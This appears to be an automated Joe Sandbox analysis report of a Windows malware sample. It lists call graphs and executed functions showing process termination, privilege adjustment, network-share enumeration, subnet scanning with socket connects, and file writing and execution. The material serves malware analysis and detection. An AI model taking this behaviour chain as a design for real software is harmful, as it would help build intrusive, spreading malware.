ca90a1 GetProcessHeap RtlFreeHeap 4561->4669 4566 ca9041 2 API calls 4565->4566 4567 ca2186 4566->4567 4671 ca530c 4567->4671 4570 ca3955 9 API calls 4573 ca21a6 4570->4573 4571 ca22b5 4572 ca22c3 4571->4572 4708 ca90a1 GetProcessHeap RtlFreeHeap 4571->4708 4579 ca22ce 4572->4579 4709 ca90a1 GetProcessHeap RtlFreeHeap 4572->4709 4573->4571 4577 ca21c6 GetComputerNameW 4573->4577 4595 ca22ad 4573->4595 4576 ca3955 9 API calls 4580 ca22db 4576->4580 4581 ca21ea 4577->4581 4582 ca21df 4577->4582 4579->4576 4710 ca90a1 GetProcessHeap RtlFreeHeap 4580->4710 4683 ca5962 EnterCriticalSection LeaveCriticalSection 4581->4683 4584 ca35d2 4 API calls 4582->4584 4584->4581 4586 ca22e4 4587 ca1e10 71 API calls 4592 ca21f3 4587->4592 4588 ca3955 9 API calls 4588->4592 4591 ca2292 Sleep 4699 ca5962 EnterCriticalSection LeaveCriticalSection 4591->4699 4592->4587 4592->4588 4592->4591 4592->4595 4684 ca5230 4592->4684 4697 ca542b WaitForSingleObject 4592->4697 4700 ca90a1 GetProcessHeap RtlFreeHeap 4592->4700 4701 ca52de 4595->4701 4597 ca6347 2 API calls 4596->4597 4598 ca1a95 4597->4598 4599 ca530c 10 API calls 4598->4599 4600 ca1aaa 4599->4600 4601 ca3c7a 10 API calls 4600->4601 4602 ca1ab3 4601->4602 4603 ca3955 9 API calls 4602->4603 4617 ca1ac7 4603->4617 4604 ca1b8a 4605 ca1b92 4604->4605 4606 ca1b97 4604->4606 4607 ca52de 5 API calls 4605->4607 4608 ca39da 2 API calls 4606->4608 4607->4606 4609 ca1b9d 4608->4609 4611 ca3955 9 API calls 4609->4611 4610 ca1b81 4613 ca542b WaitForSingleObject 4610->4613 4614 ca1baa 4611->4614 4613->4604 4782 ca90a1 GetProcessHeap RtlFreeHeap 4614->4782 4616 ca1bb3 4617->4604 4617->4606 4617->4610 4621 ca1b06 4617->4621 4781 ca5962 EnterCriticalSection LeaveCriticalSection 4617->4781 4618 ca1706 22 API calls 4618->4621 4619 ca5840 49 API calls 4619->4621 4620 ca1b36 CloseHandle 4620->4621 4621->4617 4621->4618 4621->4619 4621->4620 4622 ca1b6a CloseHandle 4621->4622 4622->4617 4624 ca3c7a 10 API calls 4623->4624 4625 ca1ce0 4624->4625 4626 ca6347 2 API calls 4625->4626 4627 ca1cee 4626->4627 4628 ca530c 10 API calls 4627->4628 4629 ca1d05 4628->4629 4630 ca3955 9 API calls 4629->4630 4644 ca1d17 4630->4644 4631 ca1dd9 4632 ca1de6 4631->4632 4633 ca1de1 4631->4633 4634 ca39da 2 API calls 4632->4634 4635 ca52de 5 API calls 4633->4635 4636 ca1def 4634->4636 4635->4632 4638 ca3955 9 API calls 4636->4638 4639 ca1dfb 4638->4639 4784 ca90a1 GetProcessHeap RtlFreeHeap 4639->4784 4640 ca1d33 GetLogicalDrives 4642 ca1dbe Sleep 4640->4642 4640->4644 4642->4644 4643 ca1e04 4644->4631 4644->4632 4644->4640 4646 ca1d54 4644->4646 4783 ca5962 EnterCriticalSection LeaveCriticalSection 4644->4783 4645 ca542b WaitForSingleObject 4645->4646 4646->4642 4646->4644 4646->4645 4647 ca1706 22 API calls 4646->4647 4648 ca5840 49 API calls 4646->4648 4647->4646 4648->4646 4650 ca38da 9 API calls 4649->4650 4651 ca231e 4650->4651 4651->4546 4652 ca3dc0 GetCurrentProcess OpenProcessToken 4651->4652 4653 ca3de6 LookupPrivilegeValueW 4652->4653 4654 ca3e25 4652->4654 4653->4654 4655 ca3df8 AdjustTokenPrivileges 4653->4655 4656 ca3e2a FindCloseChangeNotification 4654->4656 4657 ca232b 4654->4657 4655->4654 4656->4657 4657->4553 4659 ca2351 Sleep 4658->4659 4660 ca4e11 4658->4660 4659->4560 4661 ca4e25 Process32FirstW 4660->4661 4662 ca4e99 FindCloseChangeNotification 4661->4662 4663 ca4e48 4661->4663 4662->4659 4664 ca4e5d OpenProcess 4663->4664 4665 ca4e84 Process32NextW 4663->4665 4664->4663 4666 ca4e74 TerminateProcess CloseHandle 4664->4666 4665->4663 4667 ca4e98 4665->4667 4666->4663 4667->4662 4668->4560 4669->4555 4670->4558 4672 ca9041 2 API calls 4671->4672 4673 ca5315 4672->4673 4674 ca531e InitializeCriticalSectionAndSpinCount 4673->4674 4675 ca2195 4673->4675 4676 ca5368 4674->4676 4677 ca5331 CreateEventW CreateEventW 4674->4677 4675->4570 4711 ca90a1 GetProcessHeap RtlFreeHeap 4676->4711 4678 ca535c 4677->4678 4679 ca5361 4677->4679 4678->4675 4678->4679 4681 ca52de 5 API calls 4679->4681 4682 ca5366 4681->4682 4682->4675 4683->4592 4685 ca9041 2 API calls 4684->4685 4686 ca524b 4685->4686 4687 ca5258 GetIpAddrTable 4686->4687 4688 ca52d6 4686->4688 4689 ca5269 4687->4689 4690 ca52d0 4687->4690 4688->4592 4689->4690 4692 ca527a htonl 4689->4692 4733 ca90a1 GetProcessHeap RtlFreeHeap 4690->4733 4692->4689 4693 ca5285 htonl htonl 4692->4693 4712 ca5067 htons 4693->4712 4695 ca5067 88 API calls 4696 ca52a5 4695->4696 4696->4689 4696->4695 4698 ca543d 4697->4698 4698->4592 4699->4592 4700->4592 4702 ca52ef 4701->4702 4703 ca52ec CloseHandle 4701->4703 4704 ca52f9 DeleteCriticalSection 4702->4704 4705 ca52f6 CloseHandle 4702->4705 4703->4702 4780 ca90a1 GetProcessHeap RtlFreeHeap 4704->4780 4705->4704 4707 ca5309 4707->4571 4708->4572 4709->4579 4710->4586 4711->4675 4713 ca905b 2 API calls 4712->4713 4714 ca50aa 4713->4714 4715 ca905b 2 API calls 4714->4715 4729 ca50b5 4715->4729 4716 ca5219 4747 ca90a1 GetProcessHeap RtlFreeHeap 4716->4747 4718 ca5221 4748 ca90a1 GetProcessHeap RtlFreeHeap 4718->4748 4719 ca50d2 htonl socket 4721 ca50f8 ioctlsocket 4719->4721 4719->4729 4724 ca510c connect 4721->4724 4721->4729 4723 ca522a 4723->4696 4725 ca511d WSAGetLastError 4724->4725 4724->4729 4725->4729 4726 ca51e1 closesocket 4726->4729 4727 ca5161 getsockopt 4727->4726 4727->4729 4728 ca518b recv 4728->4729 4730 ca51a2 WSAGetLastError 4728->4730 4729->4716 4729->4719 4729->4726 4729->4727 4729->4728 4732 ca51b8 getpeername 4729->4732 4734 ca4fa9 GetTickCount GetTickCount 4729->4734 4738 ca2084 4729->4738 4730->4729 4732->4729 4733->4688 4736 ca4fd8 4734->4736 4735 ca505f 4735->4729 4736->4735 4737 ca5029 select GetTickCount 4736->4737 4737->4736 4749 ca8fd7 4738->4749 4741 ca2148 4776 ca5962 EnterCriticalSection LeaveCriticalSection 4741->4776 4742 ca2106 WNetUseConnectionW 4742->4741 4743 ca2130 4742->4743 4751 ca1e10 4743->4751 4746 ca2155 4746->4729 4747->4718 4748->4723 4750 ca20e0 WSAAddressToStringW 4749->4750 4750->4741 4750->4742 4752 ca9041 2 API calls 4751->4752 4753 ca1e36 4752->4753 4754 ca9041 2 API calls 4753->4754 4755 ca1e44 4754->4755 4756 ca206a 4755->4756 4757 ca1e59 WNetOpenEnumW 4755->4757 4758 ca2064 4755->4758 4759 ca207a 4756->4759 4779 ca90a1 GetProcessHeap RtlFreeHeap 4756->4779 4760 ca2054 4757->4760 4761 ca1e74 WNetEnumResourceW 4757->4761 4778 ca90a1 GetProcessHeap RtlFreeHeap 4758->4778 4759->4741 4760->4758 4764 ca205a WNetCloseEnum 4760->4764 4761->4760 4768 ca1e91 4761->4768 4764->4758 4766 ca202a WNetEnumResourceW 4766->4760 4766->4768 4767 ca1e10 65 API calls 4767->4768 4768->4760 4768->4766 4768->4767 4774 ca1faf 4768->4774 4777 ca5962 EnterCriticalSection LeaveCriticalSection 4768->4777 4769 ca35d2 4 API calls 4769->4774 4770 ca1fe2 CloseHandle 4770->4774 4771 ca3c7a 10 API calls 4771->4774 4772 ca1706 22 API calls 4772->4774 4773 ca5840 49 API calls 4773->4774 4774->4768 4774->4769 4774->4770 4774->4771 4774->4772 4774->4773 4775 ca2017 CloseHandle 4774->4775 4775->4768 4776->4746 4777->4768 4778->4756 4779->4759 4780->4707 4781->4617 4782->4616 4783->4644 4784->4643 4785->4139 4786->4133 4788 ca6347 2 API calls 4787->4788 4789 ca4566 4788->4789 4790 ca3c7a 10 API calls 4789->4790 4791 ca4588 4790->4791 4792 ca6347 2 API calls 4791->4792 4793 ca4598 4792->4793 4794 ca3a18 3 API calls 4793->4794 4795 ca45c8 4794->4795 4796 ca39b7 2 API calls 4795->4796 4797 ca45ed 4796->4797 4798 ca3bb3 9 API calls 4797->4798 4799 ca45fc 4798->4799 4800 ca6347 2 API calls 4799->4800 4801 ca460b 4800->4801 4802 ca6347 2 API calls 4801->4802 4803 ca4617 4802->4803 4804 ca3bb3 9 API calls 4803->4804 4805 ca4622 4804->4805 4806 ca9041 2 API calls 4805->4806 4807 ca4633 GetVersion GetModuleHandleA GetProcAddress 4806->4807 4808 ca466d 4807->4808 4809 ca3d4b 6 API calls 4808->4809 4810 ca4678 4809->4810 4811 ca482a 4810->4811 4854 ca4428 GetCurrentProcess OpenProcessToken 4810->4854 4813 ca3d4b 6 API calls 4811->4813 4815 ca4835 4813->4815 4816 ca39da 2 API calls 4815->4816 4818 ca483e 4816->4818 4819 ca39b7 2 API calls 4818->4819 4821 ca484e 4819->4821 4823 ca39da 2 API calls 4821->4823 4824 ca486d 4823->4824 4825 ca39b7 2 API calls 4824->4825 4826 ca487b 4825->4826 4828 ca39da 2 API calls 4826->4828 4827 ca46a9 4827->4811 4829 ca46ea 4827->4829 4830 ca46dc GetCurrentProcess 4827->4830 4831 ca4884 4828->4831 4832 ca6347 2 API calls 4829->4832 4830->4829 4833 ca39da 2 API calls 4831->4833 4834 ca4716 4832->4834 4835 ca4890 4833->4835 4834->4811 4836 ca4724 CreateFileW 4834->4836 4836->4811 4837 ca474a WriteFile 4836->4837 4837->4811 4838 ca4769 4837->4838 4838->4811 4839 ca4777 WriteFile 4838->4839 4839->4811 4840 ca4795 4839->4840 4840->4811 4841 ca479f FlushFileBuffers CloseHandle 4840->4841 4876 ca3ee1 4841->4876 4847 ca47eb 4848 ca4800 4847->4848 4849 ca47f5 WaitForSingleObject 4847->4849 4850 ca4325 14 API calls 4848->4850 4849->4848 4851 ca4810 4850->4851 4852 ca3ee1 20 API calls 4851->4852 4853 ca4819 DeleteFileW 4852->4853 4853->4811 4855 ca4464 GetTokenInformation 4854->4855 4861 ca44e4 4854->4861 4858 ca9041 2 API calls 4855->4858 4856 ca4539 4863 ca4543 4856->4863 4907 ca90a1 GetProcessHeap RtlFreeHeap 4856->4907 4857 ca4530 FreeSid 4857->4856 4859 ca4482 GetTokenInformation 4858->4859 4859->4861 4862 ca449c AllocateAndInitializeSid 4859->4862 4861->4856 4861->4857 4862->4861 4864 ca44bd 4862->4864 4863->4811 4868 ca43cc 4863->4868 4864->4861 4865 ca44c9 EqualSid 4864->4865 4865->4864 4866 ca44e6 LookupAccountSidW 4865->4866 4866->4861 4867 ca4516 GetLastError 4866->4867 4867->4861 4869 ca6347 2 API calls 4868->4869 4870 ca43df 4869->4870 4871 ca3a18 3 API calls 4870->4871 4872 ca440c 4871->4872 4873 ca39b7 2 API calls 4872->4873 4874 ca441f 4873->4874 4874->4811 4875 ca5b0e GetModuleFileNameW 4874->4875 4875->4827 4877 ca6347 2 API calls 4876->4877 4878 ca3efc 4877->4878 4879 ca3f7a 8 API calls 4878->4879 4880 ca3fc3 4879->4880 4881 ca4101 CloseHandle 4879->4881 4880->4881 4884 ca3fe6 GetCurrentProcessId OpenProcess 4880->4884 4882 ca39b7 2 API calls 4881->4882 4883 ca4113 4882->4883 4883->4811 4894 ca4325 4883->4894 4884->4881 4885 ca4007 4884->4885 4885->4881 4886 ca401b ReadProcessMemory 4885->4886 4886->4881 4887 ca4036 ReadProcessMemory 4886->4887 4887->4881 4888 ca4050 GetModuleFileNameW 4887->4888 4890 ca408c ReadProcessMemory 4888->4890 4891 ca40a0 ReadProcessMemory 4890->4891 4893 ca40db 4890->4893 4892 ca40bc 4891->4892 4891->4893 4892->4890 4892->4893 4893->4881 4895 ca3bb3 9 API calls 4894->4895 4896 ca4335 4895->4896 4897 ca435d CoInitializeEx 4896->4897 4898 ca43bb 4897->4898 4899 ca4389 4897->4899 4900 ca39b7 2 API calls 4898->4900 4908 ca5d61 4899->4908 4901 ca43c2 4900->4901 4901->4811 4904 ca3e9e 4901->4904 4921 ca8fa9 4904->4921 4907->4863 4909 ca43b2 CoUninitialize 4908->4909 4910 ca5d7b 4908->4910 4909->4898 4910->4909 4911 ca9041 2 API calls 4910->4911 4912 ca5d9c 4911->4912 4912->4909 4913 ca5dbb FindFirstFileW 4912->4913 4914 ca5dd8 4913->4914 4915 ca5eb3 4913->4915 4917 ca5e92 FindNextFileW 4914->4917 4918 ca5eaa FindClose 4914->4918 4919 ca5d61 4 API calls 4914->4919 4920 ca90a1 GetProcessHeap RtlFreeHeap 4915->4920 4917->4914 4917->4918 4918->4915 4919->4914 4920->4909 4922 ca3eb1 ShellExecuteExW 4921->4922 4922->4847 4923->4175 4924->4164 4925->4185 4926->4190 4928 ca6347 2 API calls 4927->4928 4929 ca3c3c 4928->4929 4930 ca620d 6 API calls 4929->4930 4931 ca3c69 4930->4931 4932 ca39f9 2 API calls 4931->4932 4933 ca1083 4932->4933 4933->4209 4934->4230 4935->4231 4936->4238 4937->4241 4938->4245 4939->4251 4940->4254 4941->4256 4942->4259 4944 ca3e39 5 API calls 4943->4944 4945 ca23a6 4944->4945 4946 ca3955 9 API calls 4945->4946 4949 ca23b7 4946->4949 4947 ca5962 EnterCriticalSection LeaveCriticalSection 4947->4949 4948 ca4f7a 16 API calls 4948->4949 4949->4947 4949->4948 4950 ca2418 4949->4950 4951 ca240b Sleep 4949->4951 4953 ca23f4 EnterCriticalSection LeaveCriticalSection 4949->4953 4952 ca3955 9 API calls 4950->4952 4951->4949 4954 ca2423 4952->4954 4953->4951 5186 ca5444 5191 ca5962 EnterCriticalSection LeaveCriticalSection 5186->5191 5188 ca5458 5189 ca5474 5188->5189 5192 ca349e 5188->5192 5191->5188 5193 ca34c9 EnterCriticalSection 5192->5193 5198 ca33f3 5193->5198 5196 ca34dc LeaveCriticalSection 5196->5189 5197 ca34b8 LeaveCriticalSection WaitForSingleObject 5197->5193 5200 ca3411 5198->5200 5199 ca3468 5199->5196 5199->5197 5200->5199 5201 ca3490 ResetEvent 5200->5201 5202 ca31c3 4 API calls 5200->5202 5203 ca3423 5200->5203 5201->5199 5204 ca348c 5202->5204 5203->5199 5205 ca3450 SetEvent ResetEvent 5203->5205 5204->5201 5204->5203 5205->5199

      Executed Functions

      Function 00CA29F5 Relevance: 26.0, APIs: 17, Instructions: 460sleepsynchronizationthreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 ca29f5-ca2a41 1 ca2f9e-ca2fa6 0->1 2 ca2a47-ca2a5d call ca85d9 0->2 2->1 5 ca2a63-ca2a7e call ca62a6 2->5 5->1 8 ca2a84-ca2aa4 call ca6347 GetTickCount call ca94fe 5->8 13 ca2aa6-ca2abc GetLocaleInfoW 8->13 14 ca2ad4-ca2aeb call ca2876 call ca6347 8->14 15 ca2aca 13->15 16 ca2abe-ca2ac8 13->16 27 ca2aed-ca2af1 call ca271b 14->27 28 ca2b01-ca2b17 call ca39da call ca3e39 14->28 18 ca2acc-ca2ace 15->18 16->18 18->14 20 ca2ef0-ca2ef6 18->20 22 ca2ef8 call ca597e 20->22 23 ca2efd 20->23 22->23 26 ca2f01-ca2f07 23->26 30 ca2f09 call ca597e 26->30 31 ca2f0e-ca2f10 26->31 37 ca2af6-ca2afa 27->37 49 ca2b19 28->49 50 ca2b1d-ca2b31 call ca3772 28->50 30->31 35 ca2f12-ca2f1f EnterCriticalSection 31->35 36 ca2f45-ca2f5f call ca2876 call ca39b7 31->36 40 ca2f28-ca2f2e 35->40 41 ca2f21-ca2f22 CloseHandle 35->41 55 ca2f6a-ca2f6e 36->55 56 ca2f61-ca2f65 call ca1870 36->56 37->28 42 ca2afc call ca2876 37->42 46 ca2f30-ca2f31 CloseHandle 40->46 47 ca2f37-ca2f44 DeleteCriticalSection call ca90a1 40->47 41->40 42->28 46->47 47->36 49->50 50->20 59 ca2b37-ca2b49 call ca28ca call ca5930 50->59 60 ca2f79-ca2f7d 55->60 61 ca2f70-ca2f74 call ca1870 55->61 56->55 59->26 70 ca2b4f-ca2b5a call ca5930 59->70 64 ca2f7f-ca2f8d ReleaseMutex CloseHandle 60->64 65 ca2f93-ca2f99 call ca6274 60->65 61->60 64->65 65->1 70->20 73 ca2b60-ca2b6c 70->73 74 ca2b6e-ca2b78 call ca4ea5 73->74 75 ca2be6-ca2bef call ca4ea5 73->75 74->20 80 ca2b7e-ca2b87 call ca4f7a 74->80 81 ca2c62-ca2c66 75->81 82 ca2bf1-ca2bfb call ca4f7a 75->82 93 ca2b89-ca2b8d 80->93 94 ca2ba3-ca2baa 80->94 83 ca2c98-ca2ca4 call ca4dbe 81->83 84 ca2c68-ca2c6a call ca4f7a 81->84 82->20 91 ca2c01-ca2c08 82->91 103 ca2ccc-ca2cf3 call ca3c7a call ca1894 call ca3c7a 83->103 104 ca2ca6-ca2caa 83->104 92 ca2c6f-ca2c72 84->92 96 ca2c0a-ca2c0e 91->96 97 ca2c1d-ca2c20 91->97 98 ca2c88-ca2c8c 92->98 99 ca2c74-ca2c7b call ca489e 92->99 93->94 100 ca2b8f-ca2b96 call ca49d3 93->100 101 ca2bac-ca2bb0 94->101 102 ca2bc0-ca2bc3 94->102 96->97 108 ca2c10-ca2c17 call ca242f 96->108 97->20 111 ca2c26-ca2c2a 97->111 98->83 113 ca2c8e-ca2c93 call ca2946 call ca1236 98->113 99->98 128 ca2c7d-ca2c82 Sleep 99->128 100->94 133 ca2b98-ca2b9d Sleep 100->133 105 ca2bb8-ca2bbf call ca4dbe 101->105 106 ca2bb2-ca2bb6 101->106 102->98 110 ca2bc9-ca2bcd 102->110 144 ca2cf8-ca2d00 call ca1894 103->144 104->103 107 ca2cac-ca2cca call ca3c7a call ca1894 104->107 105->102 106->102 106->105 142 ca2d04-ca2d09 107->142 108->20 108->97 119 ca2bd9-ca2be1 call ca4dbe 110->119 120 ca2bcf-ca2bd3 110->120 111->20 121 ca2c30-ca2c3a call ca4944 111->121 113->83 119->98 120->98 120->119 121->20 140 ca2c40-ca2c4b call ca4f7a 121->140 128->98 133->94 140->20 149 ca2c51-ca2c5b Sleep 140->149 142->20 147 ca2d0f-ca2d30 call ca24c2 142->147 144->142 153 ca2d3b 147->153 154 ca2d32-ca2d39 147->154 149->140 152 ca2c5d 149->152 152->20 155 ca2d3d-ca2d41 153->155 154->155 156 ca2e17-ca2e35 call ca24c2 155->156 157 ca2d47-ca2d64 CreateThread 155->157 166 ca2e39-ca2e3d 156->166 159 ca2d6a-ca2d73 157->159 160 ca2eec-ca2eee 157->160 163 ca2da3-ca2dc7 call ca24c2 159->163 164 ca2d75-ca2d9c call ca24c2 159->164 160->20 161 ca2ee1-ca2ee5 160->161 165 ca2ee6 CloseHandle 161->165 175 ca2dc9-ca2dca 163->175 176 ca2dce-ca2dfd call ca24c2 * 2 163->176 164->163 173 ca2d9e-ca2d9f 164->173 165->160 169 ca2e4b-ca2e56 call ca5962 166->169 170 ca2e3f-ca2e45 WaitForSingleObject 166->170 180 ca2e58-ca2e5c 169->180 181 ca2e97-ca2e9b 169->181 170->169 173->163 175->176 188 ca2e02-ca2e0e 176->188 185 ca2e5e-ca2e62 180->185 186 ca2e64 call ca1000 180->186 183 ca2ebe-ca2ec0 181->183 184 ca2e9d-ca2eba EnterCriticalSection LeaveCriticalSection 181->184 189 ca2ec2-ca2ecf WaitForMultipleObjects 183->189 190 ca2ed5-ca2ed9 183->190 184->183 185->186 191 ca2e69-ca2e6d 185->191 186->191 188->166 195 ca2e10-ca2e15 188->195 189->190 190->160 192 ca2edb-ca2edf 190->192 193 ca2e6f call ca2946 191->193 194 ca2e74-ca2e7b 191->194 192->165 193->194 194->181 197 ca2e7d-ca2e81 194->197 195->166 198 ca2e89-ca2e8d 197->198 199 ca2e83-ca2e87 197->199 198->181 200 ca2e8f-ca2e96 call ca4dbe 198->200 199->181 199->198 200->181
      APIs
      • GetTickCount.KERNEL32 ref: 00CA2A94
      • GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00CA2AB4
      • Sleep.KERNEL32(00001388), ref: 00CA2B9D
      • Sleep.KERNEL32(00000064), ref: 00CA2C53
      • Sleep.KERNEL32(00001388), ref: 00CA2C82
      • CreateThread.KERNELBASE(00000000,00000000,00CA239A,?,00000000,00000000), ref: 00CA2D55
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA2E45
        • Part of subcall function 00CA4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00CA2C6F,00000001), ref: 00CA4F95
        • Part of subcall function 00CA4F7A: CloseHandle.KERNEL32(?,?,00CA2C6F,00000001), ref: 00CA4F9E
      • EnterCriticalSection.KERNEL32(?), ref: 00CA2EA7
      • LeaveCriticalSection.KERNEL32(?), ref: 00CA2EB4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 00CA2ECF
      • CloseHandle.KERNEL32(?), ref: 00CA2EE6
        • Part of subcall function 00CA489E: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00CA4908
        • Part of subcall function 00CA489E: CloseHandle.KERNEL32(?), ref: 00CA491E
        • Part of subcall function 00CA489E: CloseHandle.KERNEL32(?), ref: 00CA4923
      • EnterCriticalSection.KERNEL32(?), ref: 00CA2F13
      • CloseHandle.KERNEL32(?), ref: 00CA2F22
      • CloseHandle.KERNEL32(?), ref: 00CA2F31
      • DeleteCriticalSection.KERNEL32(?), ref: 00CA2F38
      • ReleaseMutex.KERNEL32(?), ref: 00CA2F83
      • CloseHandle.KERNEL32(?), ref: 00CA2F8D
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$Sleep$CreateEnterMutexReleaseWait$CountDeleteInfoLeaveLocaleMultipleObjectObjectsProcessSingleThreadTick
      • String ID:
      • API String ID: 2025543672-0
      • Opcode ID: 8c7798bb959f0b022b54dba5cb25000c9c63793c9ba6ec3641c911a7b8c4c739
      • Instruction ID: 819844a172ee938bc0d3c9b487f7b430cb7fd430d2ccc7fe8fbd24746d13234b
      • Opcode Fuzzy Hash: 8c7798bb959f0b022b54dba5cb25000c9c63793c9ba6ec3641c911a7b8c4c739
      • Instruction Fuzzy Hash: CBF1C332508363AFDB20AFA89C41A2FB7E4AF8671DF04092EF59192191D770CE85DB53
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4DEE Relevance: 10.6, APIs: 7, Instructions: 65processCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 383 ca4dee-ca4e0b CreateToolhelp32Snapshot 384 ca4e9f-ca4ea4 383->384 385 ca4e11-ca4e46 call ca8fa9 Process32FirstW 383->385 388 ca4e48 385->388 389 ca4e99-ca4e9e FindCloseChangeNotification 385->389 390 ca4e49-ca4e5b call ca3711 388->390 389->384 393 ca4e5d-ca4e72 OpenProcess 390->393 394 ca4e84-ca4e96 Process32NextW 390->394 395 ca4e81 393->395 396 ca4e74-ca4e7f TerminateProcess CloseHandle 393->396 394->390 397 ca4e98 394->397 395->394 396->395 397->389
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CA4E00
      • Process32FirstW.KERNEL32(00CA2351,?), ref: 00CA4E38
      • OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 00CA4E68
      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00CA4E76
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CA4E7F
      • Process32NextW.KERNEL32(00CA2351,?), ref: 00CA4E8E
      • FindCloseChangeNotification.KERNELBASE(00CA2351,?,?,?), ref: 00CA4E9C
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseProcessProcess32$ChangeCreateFindFirstHandleNextNotificationOpenSnapshotTerminateToolhelp32
      • String ID:
      • API String ID: 2062350143-0
      • Opcode ID: 21cce1728a27f51b7e5d58ad7add0201c563317de0fec79b71c5ce40d8327f90
      • Instruction ID: f706b2daa8895f3adb9c435afaa7010f8a70710c56f76e052014b9e3a909b077
      • Opcode Fuzzy Hash: 21cce1728a27f51b7e5d58ad7add0201c563317de0fec79b71c5ce40d8327f90
      • Instruction Fuzzy Hash: DB11217190121ABFDB11ABA5DC88B9FBBBCEF8A718F1000A5E905E3150D7749F45CB91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3DC0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • GetCurrentProcess.KERNEL32(00000020,00CA232B,00000000,?,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DD5
      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DDC
      • LookupPrivilegeValueW.ADVAPI32(00000000,00CA232B,?), ref: 00CA3DEE
      • AdjustTokenPrivileges.KERNELBASE(00CA232B,00000000,?,00000000,00000000,00000000), ref: 00CA3E1D
      • FindCloseChangeNotification.KERNELBASE(00CA232B,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3E2D
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$AdjustChangeCloseCurrentFindLookupNotificationOpenPrivilegePrivilegesValue
      • String ID:
      • API String ID: 4140947299-0
      • Opcode ID: 5d992e10fb88fd5b993ef3c1e06157a255c08001e11927b9d4a1a0941c8646b6
      • Instruction ID: 663ec1864c2c85b1166e1998ee9c5968f9b5c7b87e346a9f7096b166149c42bd
      • Opcode Fuzzy Hash: 5d992e10fb88fd5b993ef3c1e06157a255c08001e11927b9d4a1a0941c8646b6
      • Instruction Fuzzy Hash: E601E576900229ABCB119FA6DC48AEFBFBCEF4A754F044026F906E2150D7748645CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3E39 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 447 ca3e39-ca3e4d GetVersion 448 ca3e4f-ca3e50 447->448 449 ca3e52-ca3e67 GetCurrentProcess OpenProcessToken 447->449 450 ca3e99-ca3e9d 448->450 451 ca3e8a-ca3e8e 449->451 452 ca3e69-ca3e85 GetTokenInformation 449->452 451->450 454 ca3e90-ca3e93 FindCloseChangeNotification 451->454 452->451 453 ca3e87 452->453 453->451 454->450
      APIs
      • GetVersion.KERNEL32(?,00CA2B0D), ref: 00CA3E42
      • GetCurrentProcess.KERNEL32(00000008,?), ref: 00CA3E58
      • OpenProcessToken.ADVAPI32(00000000), ref: 00CA3E5F
      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CA3E7D
      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CA3E93
      Memory Dump Source
